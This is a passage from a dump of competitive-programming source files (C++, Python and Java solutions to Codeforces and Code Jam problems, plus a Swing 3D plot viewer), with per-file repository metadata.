(int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n);\n map<array<int, 3>, int> cache;\n auto ask = [&](int i, int j, int k) {\n array<int, 3> q = {i, j, k};\n sort(all(q));\n if (cache.contains(q))\n return cache[q];\n\n writeln(\"?\", i + 1, j + 1, k + 1);\n ints(x);\n return cache[q] = x;\n };\n int mn = -1;\n int first = -1;\n FOR(i, 2, n)\n {\n int cur = ask(0, 1, i);\n if (cur > mn)\n mn = cur,\n first = i;\n }\n int mx = -1;\n int second = -1;\n FOR(i, 2, n)\n if (i != first)\n {\n int cur = ask(0, first, i);\n if (cur > mx)\n mx = cur,\n second = i;\n }\n int m = max(mx, mn);\n\n vector<int> indices = {0, 1, first, second};\n for (int x: indices)\n for (int y: indices)\n if (x != y)\n {\n bool ok = true;\n for (int z: indices)\n if (z != x && z != y)\n ok &= ask(x, y, z) == m;\n if (ok)\n return writeln(\"!\", x + 1, y + 1);\n\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.41477271914482117, "alphanum_fraction": 0.4318181872367859, "avg_line_length": 33.599998474121094, "blob_id": "aee91e1bbef009b03b11fbefec84b052e916486b", "content_id": "19299e0c13f4ea2108ee8c08584f94e205aa8b0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 176, "license_type": "no_license", "max_line_length": 76, "num_lines": 5, "path": "/CodeForce/0675/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "a, b, c = list(map(int, input().split()))\r\nif c == 0:\r\n print(\"YES\" if a == b else \"NO\")\r\nelse:\r\n print(\"YES\" if (((b - a) % c == 0) and (((b - a) // c) >= 0)) else \"NO\")" }, { "alpha_fraction": 0.4798143804073334, "alphanum_fraction": 0.4849188029766083, "avg_line_length": 20.989795684814453, "blob_id": "4c6d0226ef660dd35e6e1eb91bf6081acc2be0de", "content_id": "ffe230af5b9541878c60778ba100d0734fe26599", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2155, "license_type": "no_license", "max_line_length": 85, "num_lines": 98, "path": "/2014/gcj2014_0/D.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#ifndef CASE_HPP\n#define CASE_HPP\n\n#include <bits/stdc++.h>\n#include <QObject>\n#include <QRunnable>\n#include <QThread>\n#include <QTextStream>\n#include <QDebug>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\n\nclass Case : public QObject, public QRunnable\n{\n Q_OBJECT\n int x = 0, y = 0, n;\n vector<double> b, c;\n set<double> a;\n\npublic:\n void readInput(QTextStream &in)\n {\n in >> n;\n b.resize(n);\n double u;\n fori(n)\n in >> b[i];\n fori(n)\n in >> u,\n a.insert(u),\n c.pb(u);\n }\n\n void writeResults(QTextStream &out)\n {\n out << \"Case #\" << case_number << \": \";\n out << y << \" \" << x << \"\\n\";\n }\n\n void solution()\n {\n sort(b.begin(), b.end());\n sort(c.begin(), c.end());\n set<double>::iterator it;\n fori(n)\n {\n it = a.upper_bound(b[i]);\n if (it == a.end())\n x++;\n else\n a.erase(it);\n }\n int jc = n - 1;\n int ic = 0;\n forn(ib, n)\n {\n if (b[ib] < c[ic])\n jc--;\n else\n y++,\n ic++;\n }\n }\n\n explicit Case() : QObject(0), solved(false) { setAutoDelete(false); }\n\n void run()\n {\n solution();\n solved = true;\n emit caseSolved(this);\n }\n\n inline bool is_solved() const { return solved; }\n inline void setCaseNumber(int n) { case_number = n; }\n\nsignals:\n void caseSolved(Case*);\n\nprivate:\n int case_number;\n bool solved;\n};\n\n#endif // CASE_HPP\n" }, { "alpha_fraction": 0.45350733399391174, "alphanum_fraction": 0.4671696722507477, "avg_line_length": 31.476821899414062, "blob_id": "48627037d57359e7b79341eed999bee1c7db61bc", "content_id": "ffddcef2c6cc5c76892ea0b8c53fa1daf08fae07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4904, "license_type": "no_license", "max_line_length": 174, "num_lines": 151, "path": "/CodeForce/1786/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvector<tuple<string, string, string, string, char, char>> swaps;\n\nvoid run()\n{\n ints(n);\n vector<string> s(n);\n readln(s);\n map<string, set<int>> m;\n fori(n)\n sort(all(s[i])),\n m[s[i]].insert(i);\n\n auto del = [&](string i, int j) {\n m[i].erase(j);\n if (m[i].empty())\n m.erase(i);\n };\n vector<pair<pair<int, char>, pair<int, char>>> ans;\n while (SZ(m) > 1)\n {\n for (auto& [f, t, nf, nt, c, d]: swaps)\n if (m.contains(f) && m.contains(t))\n {\n int i = *m[f].begin();\n int j = *m[t].begin();\n del(f, i);\n del(t, j);\n\n m[nf].insert(i);\n m[nt].insert(j);\n ans.pb({{i + 1, c}, {j + 1, d}});\n break;\n }\n }\n\n writeln(ans.size());\n if (ans.size())\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n set<tuple<string, string, string, string, char, char>> swapsGood, swapsBad;\n set<string> strings;\n fori(3)\n forj(3)\n forn(k, 3)\n {\n string t;\n t.pb(\"win\"[i]);\n t.pb(\"win\"[j]);\n t.pb(\"win\"[k]);\n sort(all(t));\n strings.insert(t);\n }\n\n auto get = [&](const string& s) {\n set<char> ans(all(s));\n return ans.size();\n };\n\n for (string f: strings)\n for (string t: strings)\n {\n int wf = get(f);\n int wt = get(t);\n fori(3)\n forj(3)\n if (f[i] != t[j])\n {\n string nf(f);\n string nt(t);\n nf[i] = t[j];\n nt[j] = f[i];\n sort(all(nf));\n sort(all(nt));\n int qf = get(nf);\n int qt = get(nt);\n if (wf == qf && wt == qt)\n continue;\n if (wf > qf || wt > qt)\n continue;\n if (f == nt && t == nf)\n continue;\n if (wf < qf && wt < qt)\n swapsGood.insert({f, t, nf, nt, f[i], t[j]});\n else if (wf < qf || wt < qt)\n swapsBad.insert({f, t, nf, nt, f[i], t[j]});\n }\n }\n for (auto& x: swapsGood)\n swaps.pb(x);\n for (auto& x: swapsBad)\n swaps.pb(x);\n\n ios_base::sync_with_stdio(false); cin.tie(0);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.42735734581947327, "alphanum_fraction": 0.4467826783657074, "avg_line_length": 33.31944274902344, "blob_id": "3b35b7e7495ec5bc4c3967338da1fdbfb44cb62a", "content_id": "6f4605ddab46d84364e823c7057d18499f5dd184", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2471, "license_type": "no_license", "max_line_length": 928, "num_lines": 72, "path": "/CodeForce/0285/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a, b;\nvector<long long> fac;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n //freopen(\"input.txt\", \"r\", stdin);\n\n fac.push_back(1);\n fac.push_back(1);\n for (int i = 2; i < 17; i++)\n fac.push_back(fac[i - 1] * i);\n// for (int i = 1; i < 17; i++)\n long long ans = 0;\n //for (int i = 1; i <= 15; i = i + 2)\n b.resize(16 + 1);\n vector<bool> d;\n int i = 13;\n {\n a.clear();\n for (int s = 1; s <= i; s++)\n a.push_back(s);\n ans = 0;\n for (int q = 1; q <= i; q++)\n b[q - 1] = q;\n for (long long q = 1; q <= fac[i]; q++)\n {\n d.clear();\n d.resize(i + 2, false);\n bool f = true;\n for (int w = 0; w < i; w++)\n if (d[(a[w] - 1 + b[w] - 1) % i + 1])\n {\n f = false;\n break;\n } else\n d[(a[w] - 1 + b[w] - 1) % i + 1] = true;\n if (f)\n ans++;\n next_permutation(b.begin(), b.begin() + i);\n }\n printf(\"%I64d \", ans);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.29866665601730347, "alphanum_fraction": 0.37066665291786194, "avg_line_length": 17.75, "blob_id": "46c307fd668bc2ed0254b694043ac6b4afd2fd5a", "content_id": "8c4290f8bb1f997333b9067d492685c3549dd756", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 375, "license_type": "no_license", "max_line_length": 38, "num_lines": 20, "path": "/CodeForce/0626/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\nn, m = list(map(int, input().split()))\ni = k2 = k3 = k6 = 0\nprint(n, m, i, k2, k3, k6)\nwhile True:\n i += 1\n if i % 6 == 0:\n k6 += 1\n else:\n if i % 3 == 0:\n k3 += 1\n if i % 2 == 0:\n k2 += 1\n k2 = min(n, k2)\n k3 = min(m, k3)\n need = n - k2 + m - k3\n if need <= k6:\n print(i)\n sys.exit()\n" }, { "alpha_fraction": 0.49741899967193604, "alphanum_fraction": 0.5271828770637512, "avg_line_length": 25.77941131591797, "blob_id": "25ef9c288052fdc1bef3a83ffe6fe9ac837486d6", "content_id": "63bbdfa4922084a71b7d2243ffbd9af43c762fc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 9105, "license_type": "no_license", "max_line_length": 111, "num_lines": 340, "path": "/Ann/java2/PlotViewer.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.awt.KeyEventDispatcher;\nimport java.awt.KeyboardFocusManager;\nimport java.awt.event.KeyEvent;\nimport java.awt.image.BufferedImage;\nimport java.util.Arrays;\nimport java.util.List;\nimport java.util.Locale;\n\nimport javax.swing.ImageIcon;\nimport javax.swing.JFrame;\nimport javax.swing.JLabel;\nimport javax.swing.JPanel;\n\npublic class PlotViewer extends JFrame {\n\n\tList<Plot3D> plots;\n\n\tprivate static final long serialVersionUID = 0xe1a_9353;\n\tfinal static double PI180 = Math.PI / 180.0;\n\n\tint width, height;\n\n\tdouble ax, ay, az;\n\tdouble bx, by, bz;\n\tdouble cx, cy, cz;\n\tdouble dx, dy, dz;\n\tdouble mx, my, mz;\n\n\tint horizontalAngle = 46;\n\tint verticalAngle = 40;\n\n\tdouble zoom = 32;\n\tdouble logZoom = 5;\n\n\tdouble angleOfView = 32;\n\tdouble logAngleOfView = 5;\n\n\tdouble speed = 1.0;\n\tdouble logSpeed = 0;\n\n\tint[] black;\n\tdouble[][] depth;\n\tBufferedImage canvas;\n\tJLabel jLabel = new JLabel();\n\n\tvoid onResize() {\n\t\twidth = getWidth();\n\t\theight = getHeight();\n\n\t\tsetTitle(\"[R] <screen resized> \" + width + \"x\" + height);\n\n\t\tcanvas = new BufferedImage(width, height, BufferedImage.TYPE_INT_RGB);\n\t\tdepth = new double[width][height];\n\t\tblack = new int[width * height];\n\t\tArrays.fill(black, 0xFF000000);\n\t\tjLabel.setIcon(new ImageIcon(canvas));\n\t\tdrawPlot();\n\t}\n\n\tvoid debugVector(double sx, double sy, double sz, double fx, double fy, double fz) {\n\t\tSystem.out.println(String.format(Locale.ENGLISH, \"(%.2f,%.2f,%.2f:%.2f,%.2f,%.2f)\", sx, sy, sz, fx, fy, fz));\n\t}\n\n\tvoid clearCanvas() {\n\t\tcanvas.setRGB(0, 0, width, height, black, 0, width);\n\t\tfor (double[] dd : depth) {\n\t\t\tArrays.fill(dd, Double.POSITIVE_INFINITY);\n\t\t}\n\t}\n\n\tvoid moveVectors() {\n\t\tax += mx;\n\t\tbx += mx;\n\t\tcx += mx;\n\t\tdx += mx;\n\n\t\tay += my;\n\t\tby += my;\n\t\tcy += my;\n\t\tdy += my;\n\n\t\taz += mz;\n\t\tbz += mz;\n\t\tcz += mz;\n\t\tdz += mz;\n\t}\n\n\tvoid calculateDirectionVectors() {\n\t\tax = bx - Math.sin((90 - verticalAngle) * PI180) * Math.cos(horizontalAngle * PI180);\n\t\tay = by - Math.sin((90 - verticalAngle) * PI180) * Math.sin(horizontalAngle * PI180);\n\t\taz = bz - Math.cos((90 - verticalAngle) * PI180);\n\n\t\tif (verticalAngle == 0) {\n\t\t\tcx = bx;\n\t\t\tcy = by;\n\t\t\tcz = bz + 1;\n\t\t} else if (verticalAngle == 90) {\n\t\t\tcx = bx - Math.cos(horizontalAngle * PI180);\n\t\t\tcy = by - Math.sin(horizontalAngle * PI180);\n\t\t\tcz = bz;\n\t\t} else if (verticalAngle == -90) {\n\t\t\tcx = bx + Math.cos(horizontalAngle * PI180);\n\t\t\tcy = by + Math.sin(horizontalAngle * PI180);\n\t\t\tcz = bz;\n\t\t} else {\n\t\t\tdouble ex = ax, ey = ay, ez = az + 1.0;\n\n\t\t\tdouble f = (by * ez - bz * ey) + (az * ey - ay * ez) + (ay * bz - az * by);\n\t\t\tdouble g = -((bx * ez - bz * ex) + (az * ex - ax * ez) + (ax * bz - az * bx));\n\t\t\tdouble h = (bx * ey - by * ex) + (ay * ex - ax * ey) + (ax * by - ay * bx);\n\t\t\tdouble q = ax * (by * ez - bz * ey) - ay * (bx * ez - bz * ex) + az * (bx * ey - by * ex);\n\n\t\t\tdouble w = ax - bx;\n\t\t\tdouble u = ay - by;\n\t\t\tdouble v = az - bz;\n\t\t\tdouble t = bx * (ax - bx) + by * (ay - by) + bz * (az - bz);\n\n\t\t\tdouble a1 = (v * g - h * u) / (f * u - g * w);\n\t\t\tdouble b1 = (q * u - g * t) / (f * u - g * w);\n\n\t\t\tdouble a2 = (h * w - v * f) / (f * u - g * w);\n\t\t\tdouble b2 = (f * t - q * w) / (f * u - g * w);\n\n\t\t\tdouble da = a1 * a1 + a2 * a2 + 1;\n\t\t\tdouble db = a1 * (b1 - bx) + a2 * (b2 - by) - bz;\n\t\t\tdouble dc = (b1 - bx) * (b1 - bx) + (b2 - by) * (b2 - by) + bz * bz - 1;\n\n\t\t\tcz = (Math.sqrt(db * db - da * dc) - db) / da;\n\t\t\tcx = a1 * cz + b1;\n\t\t\tcy = a2 * cz + b2;\n\t\t}\n\n\t\tdx = bx + (ay - by) * (cz - bz) - (az - bz) * (cy - by);\n\t\tdy = by + (az - bz) * (cx - bx) - (ax - bx) * (cz - bz);\n\t\tdz = bz + (ax - bx) * (cy - by) - (ay - by) * (cx - bx);\n\t}\n\n\tvoid fillCanvas() {\n\n\t\tdouble m11 = cx - bx, m12 = dx - bx, m13 = ax - bx;\n\t\tdouble m21 = cy - by, m22 = dy - by, m23 = ay - by;\n\t\tdouble m31 = cz - bz, m32 = dz - bz, m33 = az - bz;\n\n\t\tfor (Plot3D plot : plots) {\n\t\t\tfor (int p = 0; p < plot.size; p++) {\n\t\t\t\tdouble x = m12 * (plot.x[p] - bx) + m22 * (plot.y[p] - by) + m32 * (plot.z[p] - bz);\n\t\t\t\tdouble y = m11 * (plot.x[p] - bx) + m21 * (plot.y[p] - by) + m31 * (plot.z[p] - bz);\n\t\t\t\tdouble z = m13 * (plot.x[p] - bx) + m23 * (plot.y[p] - by) + m33 * (plot.z[p] - bz);\n\n\t\t\t\tif (z > 0) {\n\t\t\t\t\tdouble scale = (z + angleOfView) / (angleOfView * zoom);\n\n\t\t\t\t\tx /= scale;\n\t\t\t\t\ty /= scale;\n\n\t\t\t\t\tx += canvas.getWidth() / 2;\n\t\t\t\t\ty += canvas.getHeight() / 2;\n\n\t\t\t\t\tif (x >= 0 && x < canvas.getWidth() && y >= 0 && y < canvas.getHeight() && z < depth[(int) x][(int) y]) {\n\n\t\t\t\t\t\tdepth[(int) x][(int) y] = z;\n\n\t\t\t\t\t\tscale = (0.5 + 0.5 / (z + 1.0));\n\n\t\t\t\t\t\tint red = (int) ((0xFF & (plot.color[p] >> 16)) * scale);\n\t\t\t\t\t\tint green = (int) ((0xFF & (plot.color[p] >> 8)) * scale);\n\t\t\t\t\t\tint blue = (int) ((0xFF & (plot.color[p] >> 0)) * scale);\n\n\t\t\t\t\t\tcanvas.setRGB((int) x, canvas.getHeight() - (int) y - 1, 0xFF000000 | (red << 16) | (green << 8) | blue);\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\t\t}\n\n\t}\n\n\tvoid drawPlot() {\n\t\tclearCanvas();\n\t\tfillCanvas();\n\t\trepaint();\n\t}\n\n\tpublic PlotViewer(List<Plot3D> plots) {\n\t\tthis.plots = plots;\n\t\tsetBounds(100, 0, 640, 480);\n\n\t\tcalculateDirectionVectors();\n\t\tonResize();\n\n\t\tJPanel jPanel = new JPanel();\n\t\tjPanel.add(jLabel);\n\t\tadd(jPanel);\n\n\t\tKeyboardFocusManager manager = KeyboardFocusManager.getCurrentKeyboardFocusManager();\n\t\tmanager.addKeyEventDispatcher(new KeyEventDispatcher() {\n\n\t\t\t@Override\n\t\t\tpublic boolean dispatchKeyEvent(KeyEvent e) {\n\t\t\t\tif (e.getID() == KeyEvent.KEY_PRESSED) {\n\n\t\t\t\t\tswitch (e.getKeyCode()) {\n\t\t\t\t\tcase 'R':\n\t\t\t\t\t\tonResize();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 32: // SPACE\n\t\t\t\t\t\tmx = speed * (ax - bx);\n\t\t\t\t\t\tmy = speed * (ay - by);\n\t\t\t\t\t\tmz = speed * (az - bz);\n\t\t\t\t\t\tmoveVectors();\n\n\t\t\t\t\t\tsetTitle(\"[SPACE] <move forward> \" + String.format(\"%.2f %.2f %.2f\", bx, by, bz));\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 16: // SHIFT\n\t\t\t\t\t\tmx = speed * (bx - ax);\n\t\t\t\t\t\tmy = speed * (by - ay);\n\t\t\t\t\t\tmz = speed * (bz - az);\n\t\t\t\t\t\tmoveVectors();\n\n\t\t\t\t\t\tsetTitle(\"[SHIFT] <move backward> \" + String.format(\"%.2f %.2f %.2f\", bx, by, bz));\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\n\t\t\t\t\tcase 37: // LEFT\n\t\t\t\t\t\tmx = speed * (bx - dx);\n\t\t\t\t\t\tmy = speed * (by - dy);\n\t\t\t\t\t\tmz = speed * (bz - dz);\n\t\t\t\t\t\tmoveVectors();\n\n\t\t\t\t\t\tsetTitle(\"[LEFT] <move left> \" + String.format(\"%.2f %.2f %.2f\", bx, by, bz));\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 39: // RIGHT\n\t\t\t\t\t\tmx = speed * (dx - bx);\n\t\t\t\t\t\tmy = speed * (dy - by);\n\t\t\t\t\t\tmz = speed * (dz - bz);\n\t\t\t\t\t\tmoveVectors();\n\n\t\t\t\t\t\tsetTitle(\"[RIGHT] <move right> \" + String.format(\"%.2f %.2f %.2f\", bx, by, bz));\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\n\t\t\t\t\tcase 38: // UP\n\t\t\t\t\t\tmx = speed * (cx - bx);\n\t\t\t\t\t\tmy = speed * (cy - by);\n\t\t\t\t\t\tmz = speed * (cz - bz);\n\t\t\t\t\t\tmoveVectors();\n\n\t\t\t\t\t\tsetTitle(\"[UP] <move up> \" + String.format(\"%.2f %.2f %.2f\", bx, by, bz));\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\n\t\t\t\t\tcase 40: // DOWN\n\t\t\t\t\t\tmx = speed * (bx - cx);\n\t\t\t\t\t\tmy = speed * (by - cy);\n\t\t\t\t\t\tmz = speed * (bz - cz);\n\t\t\t\t\t\tmoveVectors();\n\n\t\t\t\t\t\tsetTitle(\"[DOWN] <move down> \" + String.format(\"%.2f %.2f %.2f\", bx, by, bz));\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\n\t\t\t\t\tcase 'W':\n\t\t\t\t\t\tverticalAngle = Math.max(-90, verticalAngle - 2);\n\t\t\t\t\t\tcalculateDirectionVectors();\n\n\t\t\t\t\t\tsetTitle(\"[W] <turn up> \" + verticalAngle);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'S':\n\t\t\t\t\t\tverticalAngle = Math.min(90, verticalAngle + 2);\n\t\t\t\t\t\tcalculateDirectionVectors();\n\n\t\t\t\t\t\tsetTitle(\"[S] <turn down> \" + verticalAngle);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'A':\n\t\t\t\t\t\thorizontalAngle = (362 + horizontalAngle) % 360;\n\t\t\t\t\t\tcalculateDirectionVectors();\n\n\t\t\t\t\t\tsetTitle(\"[A] <turn left> \" + horizontalAngle);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'D':\n\t\t\t\t\t\thorizontalAngle = (358 + horizontalAngle) % 360;\n\t\t\t\t\t\tcalculateDirectionVectors();\n\n\t\t\t\t\t\tsetTitle(\"[D] <turn right> \" + horizontalAngle);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'Q':\n\t\t\t\t\t\tlogSpeed = Math.max(logSpeed - 1.0, -4.0);\n\t\t\t\t\t\tspeed = Math.pow(2, logSpeed);\n\t\t\t\t\t\tsetTitle(\"[Q] <speed decreased> \" + speed);\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'E':\n\t\t\t\t\t\tlogSpeed = Math.min(logSpeed + 1.0, 10.0);\n\t\t\t\t\t\tspeed = Math.pow(2, logSpeed);\n\t\t\t\t\t\tsetTitle(\"[E] <speed increased> \" + speed);\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'I':\n\t\t\t\t\t\tlogZoom = Math.min(logZoom + 1.0, 10.0);\n\t\t\t\t\t\tzoom = Math.pow(2, logZoom);\n\t\t\t\t\t\tsetTitle(\"[I] <zoom in> \" + zoom);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'O':\n\t\t\t\t\t\tlogZoom = Math.max(logZoom - 1.0, -4.0);\n\t\t\t\t\t\tzoom = Math.pow(2, logZoom);\n\t\t\t\t\t\tsetTitle(\"[O] <zoom out> \" + zoom);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'K':\n\t\t\t\t\t\tlogAngleOfView = Math.min(logAngleOfView + 1.0, 10.0);\n\t\t\t\t\t\tangleOfView = Math.pow(2, logAngleOfView);\n\t\t\t\t\t\tsetTitle(\"[K] <field of view narrowed> \" + angleOfView);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase 'L':\n\t\t\t\t\t\tlogAngleOfView = Math.max(logAngleOfView - 1.0, -4.0);\n\t\t\t\t\t\tangleOfView = Math.pow(2, logAngleOfView);\n\t\t\t\t\t\tsetTitle(\"[L] <field of view expanded> \" + angleOfView);\n\t\t\t\t\t\tdrawPlot();\n\t\t\t\t\t\tbreak;\n case '3':\n MainFrame.d3 = !MainFrame.d3;\n\t\t\t\t\t\tsetTitle(\"[3] 3d-view is \" + (MainFrame.d3 ? \"ON\" : \"OFF\"));\n\t\t\t\t\t\tMainFrame.redo();\n drawPlot();\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treturn false;\n\t\t\t}\n\t\t});\n\n\t}\n}\n" }, { "alpha_fraction": 0.31736525893211365, "alphanum_fraction": 0.46107783913612366, "avg_line_length": 26.83333396911621, "blob_id": "ae0cba1e87c5b72460669c20223481ec27fc07f7", "content_id": "36269f4c4a72c645f09fc26fae76dcf7e8de1946", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 167, "license_type": "no_license", "max_line_length": 73, "num_lines": 6, "path": "/CodeForce/1275/gen.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", 